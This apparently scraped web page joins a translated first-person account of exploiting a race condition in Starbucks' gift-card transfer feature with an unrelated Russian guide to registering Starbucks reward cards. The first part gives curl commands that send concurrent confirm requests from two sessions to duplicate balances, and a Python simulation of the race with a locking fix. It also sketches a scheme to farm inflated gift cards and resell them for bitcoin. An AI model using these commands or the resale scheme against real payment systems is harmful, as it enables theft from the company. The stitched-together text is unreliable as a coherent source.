Starbucks payment card activation. Starbucks Rewards Card

This is the story of how I found a way to generate unlimited money on Starbucks gift cards, thereby securing free coffee for life, or stealing a couple of million from them in other ways.

So, not long ago I came up with the idea of buying three Starbucks cards for $5 each.


Starbucks.com has a personal account where you can add these cards, view your balance, and even transfer money between cards.

There is a relatively little-known class of vulnerabilities called “race conditions”. I can say with confidence that most applications that could be vulnerable to this attack most likely are, because few programmers take parallel execution of the same code, and its consequences, into account when designing their programs.

It also occurs in web applications, usually in functions that transfer money, points, tokens or vouchers. I’ll go into all the intricacies of exploitation another time; for now, let’s return to the transfer between cards at Starbucks.

The transfer was built from several stateful requests. Schematically, the first request, POST /step1?amount=1&from=wallet1&to=wallet2, stored these values in the server-side session, and only the second, POST /step2?confirm, performed the transfer using the data already stored in the session and then cleared it.

This significantly complicates exploitation compared with the classic race, where you only need to fire the same request several times simultaneously. As soon as the first confirm clears the session, the second one finds an empty session! To make that work, I would have had to compose a sequence of requests that rewrites the session immediately after the first confirm clears it and before the second confirm executes. That might succeed once in a million tries, or never.

But there is always a workaround for such “semi-protections”: log into the same account from two different browsers, that is, two different sessions. Then the attack looks something like this:

# Park the same transfer parameters in both logged-in sessions (two cookies, one account).
curl -s starbucks/step1 -H "Cookie: session=session1" --data "amount=1&from=wallet1&to=wallet2"
curl -s starbucks/step1 -H "Cookie: session=session2" --data "amount=1&from=wallet1&to=wallet2"
# Confirm the $1 transfer from card 1 to card 2 in both sessions at the same instant.
# Each confirm reads its own session, so the second one never sees the state the first one cleared.
# --data "" forces a POST; the URL is quoted so the shell does not expand the '?'.
curl -s "starbucks/step2?confirm" -H "Cookie: session=session1" --data "" &
curl -s "starbucks/step2?confirm" -H "Cookie: session=session2" --data "" &
wait

After five attempts nothing interesting had happened and I was about to give up. The peculiar thing about race conditions is that an outside attacker can only probe for them blindly, because it is not known what protections are in place (rate limits per IP? per account? per action?); the only reliable way to check whether you are vulnerable is to carefully audit the source code for proper pessimistic locks in the database.

On the sixth attempt a miracle happened: the transfer went through twice, and I now had cards holding $15 and $5, $20 in total, out of the $15 I had paid in. To make this a complete proof of concept, all that remained was to make sure a store would accept the cards.
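The two-session race described above, and the pessimistic lock that closes it, as an added example that is not code from the original post or from Starbucks: a small sqlite3 simulation in which two handler threads play the two logged-in sessions. The schema, the step1/step2 function names, the per-session store and the exact shape of the bug (a debit written back from a stale read plus a credit applied as an increment, one shape that reproduces the $15/$5 outcome in the text) are assumptions; the real backend is not known. The `after_read` hook exists only to make the race reproducible on every run.

```python
import os
import sqlite3
import tempfile
import threading


def open_db(path):
    # One connection per "request handler", as separate web workers would have.
    # timeout=5 makes a writer wait for the database lock instead of failing fast;
    # isolation_level=None leaves transaction control to the explicit SQL below.
    return sqlite3.connect(path, timeout=5, isolation_level=None)


def fresh_db():
    """Constructed fixture: three $5 cards, as in the post (assumed schema)."""
    path = os.path.join(tempfile.mkdtemp(), "cards.db")
    db = open_db(path)
    db.execute("CREATE TABLE cards (id TEXT PRIMARY KEY, balance INTEGER NOT NULL)")
    db.executemany("INSERT INTO cards VALUES (?, ?)",
                   [("wallet1", 5), ("wallet2", 5), ("wallet3", 5)])
    db.close()
    return path


def balance_of(db, card):
    cur = db.execute("SELECT balance FROM cards WHERE id=?", (card,))
    (bal,) = cur.fetchone()
    cur.close()  # finish the statement so the read lock is released in autocommit mode
    return bal


def step1(sessions, sid, amount, src, dst):
    """POST /step1: park the transfer parameters in this session only."""
    sessions[sid] = {"amount": amount, "from": src, "to": dst}


def step2_vulnerable(path, sessions, sid, after_read=lambda: None):
    """POST /step2?confirm as check-then-act with no lock (assumed bug shape):
    the debit is computed from a stale read and written back as an absolute value,
    the credit is an increment.  Two confirms that both read $5 create $5."""
    params = sessions.pop(sid, None)  # clears the session, as the post describes
    if params is None:
        return "no pending transfer"
    db = open_db(path)
    try:
        bal = balance_of(db, params["from"])
        if bal < params["amount"]:
            return "insufficient funds"
        after_read()  # demo hook: both handlers have read $5 and passed the check
        db.execute("UPDATE cards SET balance=? WHERE id=?",
                   (bal - params["amount"], params["from"]))
        db.execute("UPDATE cards SET balance=balance+? WHERE id=?",
                   (params["amount"], params["to"]))
        return "ok"
    finally:
        db.close()


def step2_fixed(path, sessions, sid):
    """Same flow behind a pessimistic lock: BEGIN IMMEDIATE takes the write lock
    before the balance is read, so the second confirm waits and then sees $0."""
    params = sessions.pop(sid, None)
    if params is None:
        return "no pending transfer"
    db = open_db(path)
    try:
        db.execute("BEGIN IMMEDIATE")
        if balance_of(db, params["from"]) < params["amount"]:
            db.execute("ROLLBACK")
            return "insufficient funds"
        db.execute("UPDATE cards SET balance=balance-? WHERE id=?",
                   (params["amount"], params["from"]))
        db.execute("UPDATE cards SET balance=balance+? WHERE id=?",
                   (params["amount"], params["to"]))
        db.execute("COMMIT")
        return "ok"
    finally:
        db.close()


def race(step2, pause=False, amount=5):
    """Two logged-in sessions of one account confirm the same transfer at once."""
    path = fresh_db()
    sessions = {}
    for sid in ("session1", "session2"):
        step1(sessions, sid, amount, "wallet1", "wallet2")
    gate = threading.Barrier(2, timeout=10)  # both handlers pause after their read
    extra = {"after_read": gate.wait} if pause else {}
    results = {}

    def confirm(sid):
        results[sid] = step2(path, sessions, sid, **extra)

    threads = [threading.Thread(target=confirm, args=(sid,)) for sid in list(sessions)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    db = open_db(path)
    balances = dict(db.execute("SELECT id, balance FROM cards ORDER BY id"))
    db.close()
    return results, balances


if __name__ == "__main__":
    print("vulnerable:", race(step2_vulnerable, pause=True))  # wallet2 ends at $15
    print("fixed:     ", race(step2_fixed))  # one "ok", one "insufficient funds"
```

Run it directly: the vulnerable confirm turns $15 into $20 (wallet1 0, wallet2 15, wallet3 5), while the fixed confirm lets exactly one transfer through and rejects the other with “insufficient funds”, because the read and the write happen under one write lock. The same discipline in other databases is `SELECT ... FOR UPDATE` inside a transaction, or a single conditional `UPDATE ... WHERE balance >= ?` whose affected-row count is checked; what matters is that the check and the debit cannot be separated by another request.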

I went to the nearest open Starbucks, on Market St.

- Give me $16 worth of something.
- O_o.
- Well, what is your most expensive item?
- Those sandwiches over there.

It came out to $16.70.

So $15 went into our little Operation Y, and $16.70 was spent. Knowing the attitude of the most humane US courts toward hackers, as soon as I got home I loaded another $10 from my credit card onto my Starbucks card, so as not to owe the corporation a whole $1.70. You never know.

Next came the hardest part: reporting it. Support honestly answered that they could not put me in touch with the technical team, not at all, and that they were very sorry I felt this way. I wrote to [email protected] on March 23: silence (they did reply, on April 29). I had to find people who cared through friends and acquaintances, and only then, after 10 days, was the vulnerability fixed.

Nobody said thank you, but I was given an unambiguous hint that I had committed “fraud” and “malicious actions” and that they would still be thinking about what to do with me.

What could I have done instead? I could have set up a farm of gift cards bought in different stores around the world, generated large balances on them and sold them on gift-card resale sites at a 50 percent discount (so as not to arouse suspicion) for bitcoin. Working like that for a year or two, you could drain a couple of million dollars from this friendly company with the sweet coffee.

May 21, 2015 at 12:01 pm

How I Hacked Starbucks for Unlimited Coffee

Having a Starbucks Card is a real reward for a coffee connoisseur: a distinguishing mark that also makes life better. Starbucks has created its own internal currency, Stars, which program members earn, accumulate and exchange for bonuses in Starbucks coffee shops.

To join the bonus program, just go to the official website starbuckscard.ru and register your card. There you will also find a list of participating locations.

You can get a physical card in the design you like at any cafe in the chain and immediately top up the balance with an amount from 500 to 10,000 rubles for future purchases. You can also buy a StarbucksGifts card online at http://starbuckscoffee.ru/ru/.

How to register a Starbucks card?

Registering a Starbucks card turns it from just a convenient means of payment into a generator of gifts and bonuses.

You can register in one of two ways.

Via the website:

Step 1. Go to http://starbuckscoffee.ru/ru/

Step 2. Create a personal account, following the detailed instructions.

Step 3. Register your Starbucks Card or StarbucksGifts card on the website.

Via the mobile app:

  1. Download the Starbucks mobile app.
  2. Create an account.
  3. Register your Starbucks Card or StarbucksGifts card in the app.


Starbucks card levels

The number of gifts and bonuses from Starbucks depends entirely on the member's activity and love of coffee drinks. One Star is credited to the card for each purchase.

The more Stars, the higher the status of the card.

Green level

The Green level is assigned as soon as the card is purchased; to keep it, you must make at least one purchase within a year of registering the card on starbuckscoffee.ru. If no Stars are earned in that time, Green level privileges are frozen.

Gold level

You move from the Green level to the Gold level after earning 30 Stars in a year.


Features of the Starbucks card

The card balance is protected against theft and can be restored if the card is lost. The card also makes an excellent gift, with recognizable designs such as “Paper Hearts” or “Summer”.

Registering the card also gives you access to your full transaction history, balance checks directly from your mobile device, and tracking of bonus activity and privileges.

Green Level Privileges

Gold Level Privileges

  1. Any drink or one food item, except whole cakes, for every 12 new Stars.
  2. Any drink or food item, except whole cakes, as a birthday gift.
  3. A gold card design.
  4. Special offers sent by SMS or e-mail newsletter.

How to use the Starbucks mobile app?

The Starbucks mobile app is compatible with all devices. With it you can find the nearest coffee shops, manage your balance and auto top-up, transfer money between cards and keep up with special promotions and offers.

The Starbucks bonus program brings customers even closer to coffee, letting them explore the range of coffee beans at a discount, good for body and soul as well as for the budget.

Starbucks coffee shops are a popular place to relax and meet for lovers of quality coffee and a relaxed atmosphere. The company started by selling branded roasted beans; today it opens cafes where every visitor can not only taste a delicious coffee drink but also have breakfast or a snack, and buy professional coffee-brewing equipment and branded serving accessories. The company's representatives in Russia look after their customers and offer them membership of the “My Starbucks Rewards” program.

How to get a card

Any customer of the chain aged 14 or over can get a bonus card for free. You top it up with cash and pay for all purchases in Starbucks cafes with it. Each purchase earns 1 Star; 12 Stars entitle you to a “reward” of free coffee, tea or food, except whole pies and cakes.

This is what the rewards card looks like.

A plastic card can be issued at the checkout of any Starbucks outlet, or you can create a virtual one in the Starbucks Russia mobile app. The card is activated after registration on www.starbuckscard.ru and the first top-up.

Features of use

The Starbucks card gives its owner nice bonuses, but you need to know how to use it correctly:

  1. After registering for the My Starbucks Rewards program, activate the card on www.starbuckscard.ru and deposit the minimum amount of 500 rubles. Activation takes up to 24 hours.
  2. Bonuses are credited only when you pay with the Starbucks card.
  3. A reward is valid for 30 days from the date it is granted; if it is not used within that period, it is forfeited.
  4. You can view your balance, the history of debits and bonus credits, and top up your account through your personal account on www.starbuckscard.ru or through the mobile app. The app also lets you pay for an order directly from the phone screen (when a virtual card is registered).
  5. On the company's website you can set up one-time or automatic top-ups of a plastic or virtual card. To do this, link your bank card in your personal profile and either make a one-time payment or set up recurring top-ups. Available schedules: when the balance falls to a minimum, on a given day of each week, or on a given day of each month.

Program levels

When you register in the bonus program, you receive a Green level card. To prevent your Stars from being reset, you must make at least 1 purchase within 12 consecutive months; otherwise you can lose all the Stars you have accumulated. The Green level lets you exchange 12 Stars for a coffee drink or food item.

The Gold level is awarded for accumulating 30 or more Stars within a year. Privileges:

  • A free order of any drink or food item in exchange for 12 accumulated Stars;
  • A birthday promotion: free coffee or a food item in honor of the day;
  • A gold card design;
  • Exclusive promotions tailored to your preferences in products or payment methods, including discounts on food or drinks.

Creating a personal account lets you manage the card: activation, checking the balance and rewards, one-time or recurring auto top-up, and viewing transaction history.

To register an account, go to the website www.starbuckscard.ru and select the "Registration" tab.

Then enter your phone number and click on the “Get code” button.

In the window that opens, enter the received code.

Next, fields appear for the card number and PIN (the PIN is on the back of the plastic card, under the scratch-off panel next to the 12-digit number) and for the personal details you gave in the cafe. You can also opt in to news and promotions by e-mail.

Mobile application "Starbucks Russia"

For customers' convenience, Starbucks has released an app for Android and iOS. It lets you activate an existing card by scanning its barcode or create a fully electronic one, learn about new promotions and offers, and find the nearest coffee shops. In "Starbucks Russia" you can also view the details of your personal account.

You can top up your card and pay for your order online.

The application will also notify you about the availability of rewards.